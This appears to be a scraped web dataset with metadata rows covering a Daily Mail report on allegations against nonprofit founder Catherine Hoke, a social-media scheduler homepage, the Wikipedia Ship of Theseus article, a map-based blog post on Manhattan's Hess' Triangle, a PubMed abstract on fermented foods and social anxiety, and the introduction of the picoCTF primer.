# Prison reformer who runs nonprofit that aims to give ex-cons a 'second chance' is accused of sexual assault, harassment and ripping off her investors **Catherine Hoke runs Defy Ventures which turns ex-cons into entrepreneurs****But former employees say its leader ran an abusive work environment****Hoke is accused of misleading benefactors, and possibly ripping off clients** The founder of a nonprofit company which aims to give ex-cons a second chance in the business world is facing accusations that could see her own career ending in tatters. Catherine Hoke founded Defy Ventures, a charity that is dedicated to helping former prisoners make a new start and begin their own businesses. However she now faces some disturbing allegations of her own with a number of former employees saying she fostered an abusive work environment, misled benefactors, and may even have ripped off clients. Catherine Hoke runs Defy Ventures which turns ex-cons into entrepreneurs but she is now facing some serious allegations of her own including one of sexual harassment Hoke saw setting up Defy as her own second chance after she was discovered to have had sexual relations with four Texas prisoners on a different program she was running Several big names have donated grants to Defy including Google, the Koch brothers and Facebook COO Sheryl Sandberg. But according to The Daily Beast such names may now be regretting being associated with the charity after Defy fired its president, Roger Gordon, when he blew the whistle on allegations of sexual harassment by Hoke and fraudulent statistics exaggerating the program's successes. Hoke describes Defy as 'a second chance for people with criminal histories by offering classes for current and formerly incarcerated people.' The program operates in 15 prisons and also teaches classes online. The firm is also something of a redemption for Hoke also after she made some transgressions of her own. Hoke was running a business skills-training program for Texas prisoners in 2004, but five years later she was banned after she was discovered to have had sexual relations with four program graduates. The nonprofit, Defy Ventures, claims it is dedicated to helping former prisoners make a new start and begin their own businesses She started anew by founding Defy in 2010, making a fresh start for herself in New York. Three months ago, the company brought on Roger Gordon as its new president who had chaired a nonprofit that employed more than 100 formerly incarcerated people, but just weeks into the job Gordon began to have concerns about Hoke's conduct and suggested she may have made up numbers about the success of the program. One complaint surrounding Hoke was over a complaint brought by a female former employee who said Hoke 'reached her hand up the employee's skirt twice at a company party.' 'The employee signed a nondisclosure agreement prohibiting her from disclosing the incident or the existence of the NDA to anyone except the CEO, her husband or the COO.' One allegation against Defy is that lineups where prisoners and investors meets are more or less staged to generate donations and are repeated several times over for different groups 'Two employees who witnessed the assault were forced to relinquish their personal mobile phones and passwords.' On another occasion, a former Defy client, Kenneth Maxwell, sued Hoke in 2015 alleging he was forced out of the program over his 'refusal to consummate a personal and sexual relationship' with her. The lawsuit was later dismissed. Another female employee told The Daily Beast Hoke sexually harassed her during a business trip in 2014 forcing her to share a bed. 'When we checked in to the Vertigo Hotel, the reserved room only had one king-size bed, which Catherine and I both occupied despite my repeated suggestions that I sleep on a cot,' the female former employee wrote. The former Defy staffer allegedly quoted Hoke telling her 'she 'doesn't usually like blondes, but that I am really hot.' She also wrote that Hoke said she and her husband 'would try to 'gross each other out' by imagining a former employee masturbating, and that Hoke was sad she had to share a room on the trip 'because she wasn't able to bring her toys along.' There are questions over just how successful the ex-cons are at setting up their own business with the company facing accusations that it has misled investors by inflating the numbers The allegations were all noted in a letter written by Gordon and seen by the Daily Beast. Gordon also alleges that the company pocketed money from prospective students who never made it onto the program. 'There have been allegations that Defy has collected application fees from students without intending to admit them and that winners of in-prison business plan competitions do not receive the cash prizes they are promised,' he wrote in his letter. 'Instead, they have been asked to reimburse Defy for program costs and to sign over the money.' It's believed Defy's fees are around $1,200 to take the largely online course. Gordon said that he also felt uncomfortable at it stated figures that only 5 percent of the 5,500 students that has been through its courses re-offend, 'There is no way to arrive at this figure through any consistent and doctrinally sound methodology,' Gordon alleged in his letter to the board. 'Rather, it appears to be arrived at by selectively including program participants and by broadly defining success. More specifically, only the relatively few participants who complete the entire program are checked for recidivism and even then data is selectively omitted.' Gordon also wrote how Defy attempts to court donors by taking them on prison visits. A well polished routine exists whereby the company brings supporters along to meet students who are incarcerated students. Hoke then calls out the students using personal information such as “step to the line if your first arrest was before the age of 10.' The whole ploy appears to work well with investors however what Gordon felt uncomfortable with was the fact the same exercise would be repeated three different times for three different sets of donors in a carefully choreographed set, while still attempting to create the illusion of spontaneity. Defy fired its president, Roger Gordon, in January after blowing the whistle on allegations of sexual harassment by Hoke and fraudulent statistics exaggerating the program's successes Other employees told The Daily Beast that the figures misleadingly included people who had enrolled in classes but not necessarily taken classes. Gordon also alleged that many of the endeavors Defy claims to have helped launch never went much further than a student registering a business name with the state. After taking his concerns to the board he was suspended and told to hand over all the notes he had taken while on the job. Defy then fired Gordon citing his outreach to donors and employees. Gordon was terminated for 'communicating with donors and supporters of the organization in a manner that the Board believed was damaging to Defy and inconsistent with Mr. Gordon's fiduciary obligations' against the board's orders, Defy said in a statement. The firm also commented on Gordon's allegations: 'We feel compelled to say that Mr. Gordon's allegations do not appear to be supported by other members of the organization or by other evidence available to the investigators.' ## Most watched News videos - Dramatic moment Virginia McCullough is arrested by Essex Police - Chilling moment Virginia McCullough points officers to father's body - Clive Myrie loses his cool and calls a student a 'f***ing idiot' - Virginia McCullough reveals where police can find murder weapon - Police arrest vile predators who filmed themselves raping 13-year-old - 'I deserve what's coming': Virginia McCullough confesses to murders - Bill Maher: 'Things are not looking great for the Democrats' - CCTV captures large dog mauling a smaller Shiba Inu in Dandenong - Daughter of Lt. Dan warns how cash and attention will affect her dad - Keir Starmer rebukes Transport Secretary claims over P&O gaffe - Obama scolds black voters and urges them to make the right choice - Audience members need medical treatment after sex scenes at OPERA
true
true
true
The founder of a nonprofit company which aims to give ex-cons a second chance in the business world is facing accusations that could see her own career ending in tatters.
2024-10-12 00:00:00
2018-03-16 00:00:00
https://i.dailymail.co.u…521232770486.jpg
article
dailymail.co.uk
Daily Mail
null
null
15,581,462
https://www.apifort.com/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
9,387,399
http://aeon.co/magazine/psychology/why-dont-our-brains-explode-at-movie-cuts/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
34,423,516
https://www.epicurious.com/expert-advice/why-ice-cubes-are-popular-in-america-history-freezer-frozen-tv-dinners-article
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
13,781,807
http://mashable.com/2017/03/03/mcdonald-serves-dead-lizard-in-fries-pregnant-woman/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
28,293,915
https://igchicago.org/2021/08/24/oig-finds-that-shotspotter-alerts-rarely-lead-to-evidence-of-a-gun-related-crime-and-that-presence-of-the-technology-changes-police-behavior/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
3,205,097
http://www.randsinrepose.com/archives/2011/11/06/why.html
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
12,303,358
https://clocktweets.com/en/
Schedule your posts with love · Swello
Jonathan NOBLE
Features Pricing Blog Log in Book a demo Sign up for free Scheduling Schedule all your contents Team management Create and organize your team Analysis Export your best reports Monitoring Dashboard What is being said about you Monitoring Dashboard Scheduling Instagram scheduling Team management Overall Statistics Simultaneous scheduling Recurring scheduling Duplicate Posts Social Media Calendar Posts preview Shared library Top/Flop 10 Posts Hashtags suggestion Link shortener Image editor Profiles Grouping Quality Coach Mentions & auto-completion Best times to post Suggested GIFs & Images Mobile Applications A simple & efficient solution to manage your social media accounts * always with love Conduct your monitoring, schedule your content and analyze the impact of your posts on social networks from a single dashboard Try for free Watch our demo 4.8/5 – 124 reviews on Trustpilot We support more than 140K communicators , including 600 major groups in their Social Media strategy Manage all your social media accounts with From LinkedIn to Instagram, including TikTok, Facebook, and X (ex-Twitter), Swello allows you to quickly communicate with your various communities. Start now No credit card required A very easy to use all-in-one solution developed for Monitoring Every day, discover many articles to share and follow what is said about you on the internet and social networks. Find out more Schedule your Posts Save time by scheduling all your posts (LinkedIn, Instagram, TikTok, Facebook and X (ex-Twitter)) from Swello. Find out more Manage your community Gather your incoming messages and comments in a single inbox. (coming soon) Soon! Analyze your results Measure the impact of your published posts & find out what your audience likes best. Find out more But also, essential tools to help you save even more time and make your daily work easier: Swello Pixel Adapt your visuals to the right format, add text, filters and save your templates in a few clicks! Link shortener Reduce and customize your entire URLs, while tracking their performance. Quality coach With personalized advice, write messages tailored to your audience and schedule them at the best times. Team management Work with your team and your clients simply. Assign them different roles (reader, writer, editor). Shared library Store, access and re-use your content (text and media) directly from the platform! Editorial calendar Get a complete view of all your publications, add your events and share them with your customers. Mobile Apps for iOS / Android Schedule and manage all your drafts and pending posts from your pocket. Made in France Based a few meters from the sea (Toulon), the whole Swello team is there to put you in a good mood. Discover all the features "The interface is simple, fun and very easy to learn. The Swello team is also easy to contact and very professional!" Camille Deschamps Communication Officer – MAIF "Swello allows us to manage our social accounts efficiently. A team that is always present and a platform that is always evolving. " Léa Bulteau Community Manager – BDO France "Very easy to use and efficient solution. My team can't live without it, it's the perfect tool! I highly recommend!" Léo Dubois Communication Officer – Roissy-en-Brie "Easy to use, efficient and equipped with many features, Swello has revolutionized our organization and saved invaluable time!" Isabelle Benoit Community Manager – La Londe-les-Maures « Very practical tool, which adds new features that keep pace with the developments of social networks, coupled with an attentive team. » Sophie Renard Communication Officer – Lyon Bar Association, Order of lawyers. Find subscription fitting your needs Try Swello unlimited for 7 days, free of charge Yearly Save 2 months! Monthly i Medium 9.90 € or 118,80 HT per year € excl. VAT per year billed monthly 1 user 5 social profiles Schedule Features Analysis Features Monitoring Features Get Started Find out more Large 29.90 € or 358,80 HT per year € excl. VAT per year billed monthly 5 users 15 social profiles Schedule Features Analysis Features Monitoring Features Get Started Find out more Business From 49.90 € or 598,80 HT per year € excl. VAT per year billed monthly More than 5 users More than 15 social profiles Schedule Features Analysis Features Monitoring Features Get Started Find out more
true
true
true
Schedule your posts with love. Save time and manage your social media strategy easily.
2024-10-12 00:00:00
2024-01-01 00:00:00
https://swello.com/bundl…mepage-og-en.jpg
website
swello.com
Swello.com
null
null
17,962,230
https://blog.wallaroolabs.com/2018/09/converting-a-batch-job-to-real-time/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
39,660,669
https://en.wikipedia.org/wiki/Ship_of_Theseus
Ship of Theseus - Wikipedia
null
# Ship of Theseus The **Ship of Theseus**, also known as **Theseus's Paradox**, is a paradox and a common thought experiment about whether an object is the same object after having all of its original components replaced over time, typically one after the other. In Greek mythology, Theseus, the mythical king of the city of Athens, rescued the children of Athens from King Minos after slaying the minotaur and then escaped onto a ship going to Delos. Each year, the Athenians would commemorate this by taking the ship on a pilgrimage to Delos to honour Apollo. A question was raised by ancient philosophers: After several hundreds of years of maintenance, if each individual piece of the Ship of Theseus were replaced, one after the other, was it still the same ship? In contemporary philosophy, this thought experiment has applications to the philosophical study of identity over time. It has inspired a variety of proposed solutions and concepts in contemporary philosophy of mind concerned with the persistence of personal identity. ## History [edit]In its original formulation, the "Ship of Theseus" paradox concerns a debate over whether or not a ship that had all of its components replaced one by one would remain the same ship. [1] The account of the problem has been preserved by Plutarch in his *Life of Theseus*:[2] The ship wherein Theseus and the youth of Athens returned from Crete had thirty oars, and was preserved by the Athenians down even to the time of Demetrius Phalereus, for they took away the old planks as they decayed, putting in new and strong timber in their places, insomuch that this ship became a standing example among the philosophers, for the logical question of things that grow; one side holding that the ship remained the same, and the other contending that it was not the same. — Plutarch,Life of Theseus23.1 Over a millennium later, the philosopher Thomas Hobbes extended the thought experiment by supposing that a ship custodian gathered up all of the decayed parts of the ship as they were disposed of and replaced by the Athenians, and used those decayed planks to build a second ship.[2] Hobbes then posed the question of which of the two resulting ships—the custodian's or the Athenians'—was the same ship as the "original" ship.[1] For if that Ship of Theseus (concerning the Difference whereof, made by continual restoration, in taking out the old Planks, and putting in new, the sophisters of Athens were wont to dispute) were, after all the Planks were changed, the same Numerical Ship it was at the beginning; and if some Man had kept the Old Planks as they were taken out, and by putting them afterward together in the same order, had again made a Ship of them, this would, without doubt, had also been the same Numerical Ship with that which was at the beginnings and so there would have been two Ships Numerically the same, which is absurd... But we must consider by what name anything is called when we inquire concerning the Identity of it... so that a Ship, which signifies Matter so figured, will be the same, as long as the Matter remains the same; but if no part of the Matter is the same, then it is Numerically another Ship; and if part of the Matter remains, and part is changed, then the Ship will be partly the same, and partly not the same. — Hobbes, "Of Identity and Difference"[3] Hobbes considers the two resulting ships as illustrating two definitions of "Identity" or sameness that are being compared to the original ship: - the ship that maintains the same "Form" as the original, that which persists through complete replacement of material and; - the ship made of the same "Matter", that which stops being 100 per cent the same ship when the first part is replaced. [3][4] ## Proposed resolutions [edit]The Ship of Theseus paradox can be thought of as an example of a puzzle of material constitution — that is, a problem with determining the relationship between an object and the material of which it is made.[1] ### Constitution is not identity [edit]According to the *Stanford Encyclopedia of Philosophy*, the most popular solution is to accept the conclusion that the material out of which the ship is made is not the same object as the ship, but that the two objects simply occupy the same space at the same time.[1] ### Temporal parts [edit]Another common theory, put forth by David Lewis, is to divide up all objects into three-dimensional time-slices which are temporally distinct. This avoids the issue that the two different ships exist in the same space at one time and a different space at another time by considering the objects to be distinct from each other at *all* points in time.[1] ### Cognitive science [edit]According to other scientists, the thought puzzle arises because of extreme externalism: the assumption that what is true in our minds also holds true in the world.[5] Noam Chomsky says that this is not an unassailable assumption, from the perspective of the natural sciences, because human intuition is often mistaken.[6] Cognitive science would treat this thought puzzle as the subject of an investigation of the human mind. Studying this human confusion can reveal much about the brain's operation, but little about the nature of the human-independent external world.[7] Following on from this observation, a significant strand[ who?] in cognitive science would consider the ship not as a thing, nor even a collection of objectively existing thing parts, but rather as an organisational structure that has perceptual continuity. [8] ### Deflationism [edit]According to the *Stanford Encyclopedia of Philosophy*, the deflationist view is that the facts of the thought experiment are undisputed; the only dispute is over the meaning of the term "ship" and is thus merely verbal.[1] American philosopher Hilary Putnam asserts that "the logical primitives themselves, and in particular the notions of object and existence, have a multitude of different uses rather than one absolute 'meaning'."[9] This thesis—that there are many meanings for the existential quantifier that are equally natural and equally adequate for describing all the facts—is often referred to as "the doctrine of quantifier variance."[10] ### Continued identity theory [edit]This solution (proposed by Kate, Ernest et al.) sees an object as staying the same as long as it continuously and metaphysically exists under the same identity without being fully transformed at one time. For instance, a house that has its front wall destroyed and replaced at year 1, the ceiling replaced at year 2, and so on, until every part of the house has been replaced will still be understood as the same house. However, if every wall, the floor, and the roof are destroyed and replaced at the same time, it will be known as a new house.[ citation needed] ## Alternative forms [edit]In Europe, several independent tales and stories feature knives of which the blades and handles had been replaced several times but are still used and represent the same knife. France has Jeannot's knife,[11][12] Spain uses Jeannot's knife as a proverb, though it is referred to simply as "the family knife", and Hungary has "Lajos Kossuth's pocket knife". Several variants or alternative statements of the underlying problem are known, including the **grandfather's axe**[13] and **Trigger's broom**,[14][15] where an old axe or broom has had both its head and its handle replaced, leaving no original components. The Tin Woodman, a character in the fictional Land of Oz, was originally a man of flesh and blood, but all his body parts were replaced one by one by metal parts as a result of a curse placed on his axe. Nevertheless, his identity is retained. Interestingly, he later meets his old body reassembled again into Nick Chopper. The ancient Buddhist text *Da zhidu lun* contains a similar philosophical puzzle: a story of a traveller who encountered two demons in the night. As one demon ripped off all parts of the traveler's body one by one, the other demon replaced them with those of a corpse, and the traveller was confused about who he was.[16] The French critic and essayist Roland Barthes refers at least twice to a ship that is entirely rebuilt, in the preface to his *Essais Critiques* (1971) and later in his *Roland Barthes par Roland Barthes* (1975); in the latter, the persistence of the form of the ship is seen as a key structuralist principle. He calls this ship the *Argo*, on which Theseus was said to have sailed with Jason; he may have confused the *Argo* (referred to in passing in Plutarch's *Theseus* at 19.4) with the ship that sailed from Crete (*Theseus*, 23.1). In Japan, the Ise Grand Shrine is rebuilt every twenty years with entirely "new wood". The continuity over the centuries is considered spiritual and comes from the source of the wood, which is harvested from an adjoining forest that is considered sacred.[17][18] ## See also [edit]## Citations [edit]- ^ **a****b****c****d****e**Wasserman.**f** - ^ **a**Blackburn 2016.**b** - ^ **a**Hobbes 1656.**b** **^**Rea 1997, p. xix.**^**Chomsky 2009, p. 382.**^**Chomsky 2010, p. 9.**^**McGilvray 2013, p. 72.**^**Grand 2003, Introduction.**^**Putnam, H., 1987, "Truth and Convention: On Davidson’s Refutation of Conceptual Relativism", Dialectica, 41: 69–77**^**Hirsch, E., 1982, The Concept of Identity, Oxford: Oxford University Press. 2002b, "Quantifier Variance and Realism", Philosophical Issues, 12: 51–73.**^**"Dumas in his Curricle".*Blackwood's Edinburgh Magazine*.**LV**(CCCXLI): 351. January–June 1844.**^**Laughton, John Knox.*Memoirs of the Life and Correspondence of Henry Reeve, C.B., D.C.L. In Two Volumes., Volume 2*. Hamburg, Germany: tredition GmbH. pp. Chapter XXIII. ISBN 978-3-8424-9722-1.**^**Browne, Ray Broadus (1982).*Objects of Special Devotion: Fetishism in Popular Culture*. Popular Press. p. 134. ISBN 0-87972-191-X.**^**"Heroes and Villains". BBC. Retrieved 16 January 2014.**^**Casadevall, Nicole; Flossmann, Oliver; Hunt, David (27 April 2017). "Evolution of biological agents: how established drugs can become less safe".*BMJ*.**357**: j1707. doi:10.1136/bmj.j1707. hdl:20.500.11820/807b405b-e5f0-4ca5-95de-056b1fe3f7d7. ISSN 0959-8138. PMID 28450275. S2CID 1826593.**^**Huang & Ganeri 2021.**^**常若(とこわか)=伊勢神宮・式年遷宮にみる和のサステナビリティ (in Japanese). Daiwa Institute of Research Ltd. 6 April 2016. Archived from the original on 7 May 2021. Retrieved 5 November 2022.**^**Shinnyo Kawai (2013)*常若の思想 伊勢神宮と日本人*. Shodensha. ISBN 978-4396614669 ## General and cited references [edit]- Blackburn, Simon, ed. (2016). "Ship of Theseus" (Ebook). *The Oxford dictionary of philosophy*(Third ed.). Oxford: Oxford University Press. ISBN 9780191799556. OCLC 945776618. - Chomsky, Noam (2010). *Chomsky Notebook*. Columbia University Press. p. 9. ISBN 978-0-231-14475-9. - Chomsky, Noam (29 January 2009). Massimo Piattelli-Palmarini; Juan Uriagereka; Pello Salaburu (eds.). *Of Minds and Language: A Dialogue with Noam Chomsky in the Basque Country*. Oxford University Press. p. 382. ISBN 978-0-19-156260-0. - Grand, Steve (May 2003). *Creation: Life and How to Make It*. Harvard University Press. ISBN 978-0-674-01113-7. Retrieved 24 September 2022. - Hobbes, Thomas (1656). "On Identity and Difference". *Elements of philosophy: the first section, concerning body*. London: R & W Leybourn. pp. 100–101. Retrieved 24 September 2022. - Huang, Jing; Ganeri, Jonardon (2021). "Is this me? A story about personal identity from the *Mahāprajñāpāramitopadeśa*/*Dà zhìdù lùn*".*British Journal for the History of Philosophy*.**29**(5): 739–762. doi:10.1080/09608788.2021.1881881. S2CID 233821050. - McGilvray, James (25 November 2013). *Chomsky: Language, Mind and Politics*. Polity. pp. 72–. ISBN 978-0-7456-4990-0. - Rea, Michael Cannon, ed. (1997). "Introduction". *Material Constitution: A Reader*. Rowman & Littlefield. ISBN 978-0-8476-8384-0. Retrieved 24 September 2022. - Wasserman, Ryan. "Material Constitution". In Zalta, Edward N. (ed.). *Stanford Encyclopedia of Philosophy*. ## Further reading [edit]- Brown, Christopher (2005). *Aquinas and the Ship of Theseus: Solving Puzzles about Material Objects*. A&C Black. ISBN 978-1-84714-402-7. Retrieved 24 September 2022. - Deutsch, Harry; Garbacz, Pawel. "Relative Identity". In Zalta, Edward N. (ed.). *Stanford Encyclopedia of Philosophy*. ## External links [edit]*.* **Ship of Theseus**
true
true
true
null
2024-10-12 00:00:00
2003-07-15 00:00:00
null
website
wikipedia.org
Wikimedia Foundation, Inc.
null
null
38,216,528
https://lanre.wtf/blog/2023/01/12/on-actionable-and-actually-useful-logs
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
17,736,223
https://chriswhong.com/open-data/in-search-of-hess-triangle-part-1/
In Search of Hess’ Triangle – Part 1
Chris
# In Search of Hess’ Triangle – Part 1 In late July, this Atlas Obscura article about “New York’s Smallest Piece of Private Property” came hurtling out of the internet and arrived on my doorstep. Urban Planners and local historians delight, on the Isle of Manhattan there’s a tiny triangle of land emblazoned with tiles that spell out this message for all eternity: **“PROPERTY OF THE HESS ESTATE WHICH HAS NEVER BEEN DEDICATED FOR PUBLIC PURPOSES”** Photo by David Gallagher via Flickr Curiosity Piqued. The article goes on to recount the story of how this triangle came to be: In the early 1900s, New York City extended 7th Avenue (and the IRT subway line beneath it) and drew a 100-foot wide path through 11 blocks of Greenwich Village. If your property was between these lines, it was set to be demolished. Our little outspoken triangle was the teeny, tiny corner of a property that once held an apartment building overlooking Sheridan Square, where Christopher and Grove Streets now intersect with 7th Avenue. The owner of this apartment building was named David Hess. He died a few years after the taking, but in 1922, his estate saw fit to leave a little message for the world to know what injustice had occurred in the name of progress. Hess’ Triangle can be found on the sidewalk in front of the entrance to Village Cigars at the corner of Christopher Street and 7th Avenue. Photo by Dion Crannitch via Flickr Naturally, I got to googling, and dug up everything I could about this amazing little triangle. I wanted to know about the building that was there, when it was finally torn down, how hard Hess and his fellow property owners fought to save their buildings, and who made the decision to lay the tile. It turns out there are many other triangles just like it, and you’ll never look at 7th Avenue in the village the same way again. My first intuition was to check out the historic maps available from the New York Public Library to verify the existence of this doomed apartment building. First, here’s a current OSM map to get you situated. Hess’ Triangle sits at the southwest corner of the intersection of Christopher Street and 7th Avenue, in front of the entrance to the small triangular building that houses Village Cigars. The first map I found was the Bromley Atlas from 1897, which clearly shows the original plot: The lot is marked “VORHES”, though some articles call it “Voorhees” or “Voorhis”, the name of the apartment building. What’s even more interesting is the Block and Lot numbers, which remain the same today. The **591** you see in the bottom left corner is the Block Number, and the **55** written inside the plot is the lot number. These days, we refer to lots by their BBL, or Borough (1 digit), Block (5 digits), and Lot (4 digits). So the BBL of the Vorhis Apartments would have been 1005910055! Having some fun in QGIS, we can orthorectify this historic map and overlay it on the modern map: If you follow the current building line of 7th Avenue, you can clearly see that it would nip a tiny little corner off of the Vorhis lot! You can also see that the adjoining buildings also got clipped, and the triangle-shaped building that is now Village Cigars was once a mighty quadrangle with faces on Christopher *and* Grove Streets. Another Bromley Atlas from 14 years later (1911) shows the building still standing, but the 100 foot-wide path for the 7th Avenue extension seems to be lightly sketched over the condemned buildings. You can clearly see that a tiny corner of the lot, now spelled “Voorhis”, lies outside of the path of destruction. Finally, in another Bromley Atlas from 1916, the 7th Avenue Extension is complete: But wait, is that a **55** I see at the corner of Christopher Street and 7th Avenue? Lot 55 lives! We can’t see the line separating it from Lot 54 at this resolution, but it’s there. So exactly how big was Hess’ Triangle? Using Open Data, we can figure it out. Articles state that it was sold in the 1930s to the adjacent building (Lot 54, now Village Cigars). Lets take a look at New York City’s PLUTO data. Note the BBL I mentioned earlier. There is no more lot 55, it’s been combined with lot 54: All three of the Bromley Atlases shown above show that the Christopher Street faces of lots 52, 53, and 54 are each 26 feet. Using QGIS, we can measure each one. The measurements match up for lots 52 and 53, but lot 54’s Christopher Street Edge is 29.57 feet! So one edge of Hess’ Triangle was 3.57 feet long. Assuming the edge that ran between Christopher and Grove Streets was parallel to those of its neighbors, we can actually separate the polygon from lot 54 and give Hess’ Triangle its rightful lot number of 55 once again! There it is! According to QGIS, its area is about 7.3 square feet. For all you geonerds, here’s Hess’ triangle as a shapefile (NY State Plane Long Island feet) and GeoJSON (WGS84). hess.zip (Shapefile) hess.geojson (Geojson saved as .txt because WordPress doesn’t allow you to upload geojson) **Edit 9/3/14:** My friend and fellow map nerd Elliott Plack in Baltimore uploaded the geoJSON to github so you can see it on a map. **Coming in Part 2**: - Lots of original news articles referencing David Hess’ Doomed Building, and one written the day after the tiles were laid in 1927. - Analysis of some of the other tiny triangles left behind by the 7th Avenue Extension Stay tuned, and thanks for reading! ## Leave a Reply
true
true
true
null
2024-10-12 00:00:00
2014-09-02 00:00:00
null
null
chriswhong.com
chriswhong.com
null
null
1,045,189
http://www.coolinfographics.com/blog/2010/1/8/16-infographic-resumes-a-visual-trend.html
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
9,699,993
http://www.ncbi.nlm.nih.gov/pubmed/25998000
Fermented foods, neuroticism, and social anxiety: An interaction model - PubMed
Username
# Fermented foods, neuroticism, and social anxiety: An interaction model - PMID: **25998000** - DOI: 10.1016/j.psychres.2015.04.023 # Fermented foods, neuroticism, and social anxiety: An interaction model ## Abstract Animal models and clinical trials in humans suggest that probiotics can have an anxiolytic effect. However, no studies have examined the relationship between probiotics and social anxiety. Here we employ a cross-sectional approach to determine whether consumption of fermented foods likely to contain probiotics interacts with neuroticism to predict social anxiety symptoms. A sample of young adults (N=710, 445 female) completed self-report measures of fermented food consumption, neuroticism, and social anxiety. An interaction model, controlling for demographics, general consumption of healthful foods, and exercise frequency, showed that exercise frequency, neuroticism, and fermented food consumption significantly and independently predicted social anxiety. Moreover, fermented food consumption also interacted with neuroticism in predicting social anxiety. Specifically, for those high in neuroticism, higher frequency of fermented food consumption was associated with fewer symptoms of social anxiety. Taken together with previous studies, the results suggest that fermented foods that contain probiotics may have a protective effect against social anxiety symptoms for those at higher genetic risk, as indexed by trait neuroticism. While additional research is necessary to determine the direction of causality, these results suggest that consumption of fermented foods that contain probiotics may serve as a low-risk intervention for reducing social anxiety. ** Keywords: ** Exercise; Neuroticism; Probiotic; Social anxiety disorder; Social phobia. Copyright © 2015 Elsevier Ireland Ltd. All rights reserved. ## Similar articles - The relationship of social anxiety disorder symptoms with probable attention deficit hyperactivity disorder in Turkish university students; impact of negative affect and personality traits of neuroticism and extraversion.Psychiatry Res. 2017 Aug;254:158-163. doi: 10.1016/j.psychres.2017.04.039. Epub 2017 Apr 22. Psychiatry Res. 2017. PMID: 28460287 - Fermented cereal beverages: from probiotic, prebiotic and synbiotic towards Nanoscience designed healthy drinks.Lett Appl Microbiol. 2017 Aug;65(2):114-124. doi: 10.1111/lam.12740. Epub 2017 Jun 7. Lett Appl Microbiol. 2017. PMID: 28378421 Review. - Cognitive risk factors explain the relations between neuroticism and social anxiety for males and females.Cogn Behav Ther. 2017 Apr;46(3):224-238. doi: 10.1080/16506073.2016.1238503. Epub 2016 Oct 3. Cogn Behav Ther. 2017. PMID: 27690746 - Probiotic bacteria in fermented foods: product characteristics and starter organisms.Am J Clin Nutr. 2001 Feb;73(2 Suppl):374S-379S. doi: 10.1093/ajcn/73.2.374s. Am J Clin Nutr. 2001. PMID: 11157344 Review. - Genetic co-morbidity between neuroticism, anxiety/depression and somatic distress in a population sample of adolescent and young adult twins.Psychol Med. 2012 Jun;42(6):1249-60. doi: 10.1017/S0033291711002431. Epub 2011 Nov 4. Psychol Med. 2012. PMID: 22051348 ## Cited by - An Anti-Inflammatory Diet and Its Potential Benefit for Individuals with Mental Disorders and Neurodegenerative Diseases-A Narrative Review.Nutrients. 2024 Aug 10;16(16):2646. doi: 10.3390/nu16162646. Nutrients. 2024. PMID: 39203783 Free PMC article. Review. - Predispose, precipitate, perpetuate, and protect: how diet and the gut influence mental health in emerging adulthood.Front Nutr. 2024 Mar 5;11:1339269. doi: 10.3389/fnut.2024.1339269. eCollection 2024. Front Nutr. 2024. PMID: 38505265 Free PMC article. Review. - Development of the gut microbiota in the first 14 years of life and its relations to internalizing and externalizing difficulties and social anxiety during puberty.Eur Child Adolesc Psychiatry. 2024 Mar;33(3):847-860. doi: 10.1007/s00787-023-02205-9. Epub 2023 Apr 18. Eur Child Adolesc Psychiatry. 2024. PMID: 37071196 Free PMC article. - Brain-gut microbiome profile of neuroticism predicts food addiction in obesity: A transdiagnostic approach.Prog Neuropsychopharmacol Biol Psychiatry. 2023 Jul 13;125:110768. doi: 10.1016/j.pnpbp.2023.110768. Epub 2023 Apr 13. Prog Neuropsychopharmacol Biol Psychiatry. 2023. PMID: 37061021 Free PMC article. - The gut microbiome in social anxiety disorder: evidence of altered composition and function.Transl Psychiatry. 2023 Mar 20;13(1):95. doi: 10.1038/s41398-023-02325-5. Transl Psychiatry. 2023. PMID: 36941248 Free PMC article. ## MeSH terms ## LinkOut - more resources ### Full Text Sources ### Medical
true
true
true
Animal models and clinical trials in humans suggest that probiotics can have an anxiolytic effect. However, no studies have examined the relationship between probiotics and social anxiety. Here we employ a cross-sectional approach to determine whether consumption of fermented foods likely to contain …
2024-10-12 00:00:00
2015-08-15 00:00:00
https://cdn.ncbi.nlm.nih…eta-image-v2.jpg
website
ncbi.nlm.nih.gov
PubMed
null
null
22,766,423
https://wfhtimes.substack.com/p/march-30-2020-universal-mask-policy
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
31,168,859
https://primer.picoctf.org/
The CTF Primer
Samuel Sabogal Pardo; Jeffery John; Luke Jones
## 1. Introduction You are going to have real fun here. And, you will gain the ability to do impressive things in life using a computer. It will be like acquiring a superpower to be able to do things that ordinary people cannot do. Let’s see how that is possible. A common mobile device, the one you might have in your hands right now, can have 100,000 times more computing power than the computer used to send humans to the moon for the first time. There are 7.7 billion humans; did you know that by 2020 there will be more than 30 billion devices connected to the Internet? Imagine all that power… you could do many unprecedented things with only a little part of it, and that power keeps growing everyday… Our world depends on computers. Imagine the apocalyptic catastrophe if computers ceased to work: money in banks is inaccessible, all telecommunications die, airports cease functioning and commercial airliners would fall from the sky, energy distribution systems become uncontrollable, hospitals and critical life support systems would irrevocably fail, and our society would collapse. In 1988, a single person, without bad intentions, took down all the Internet with just one malicious program, known as the Morris Worm. Society was different at that time so it was not as catastrophic as it would have been now. But, why we have not collapsed yet? The only way to overcome a weakness is to first know that it exists. Hackers find weaknesses in the computer world. The word hacker has had several definitions throughout history. In a dictionary, we can find two related definitions: - An expert at programming and solving problems with a computer - A person who illegally gains access to and sometimes tampers with information in a computer system We are going to take a little from both definitions, but we will gain access and tamper with information for good. In other words, a skill can be used for malicious purposes or, to become the real-life hero that manipulates technology at will, keeping the planes in the sky, and society out of collapse. That sounds romantic, but you will realize that just the mere fact of making your computer make something awesome, and getting a secret flag generates emotions and adrenaline. Come with us on this journey to become a real hacker! ## 2. The Shell ##### Luke Jones The Shell is foundational to so many parts of securing computing devices and their networks. Intimidating and alluring (like most symbols enshrined by film makers), understanding the shell can make or break one’s ability to solve challenges in a capture-the-flag competition like picoCTF. To be transparent, I (LT) am still learning a lot about the shell, and I’m just about 10 years into it right now! This is an encouragement - anyone curious enough to jump into rabbit holes here 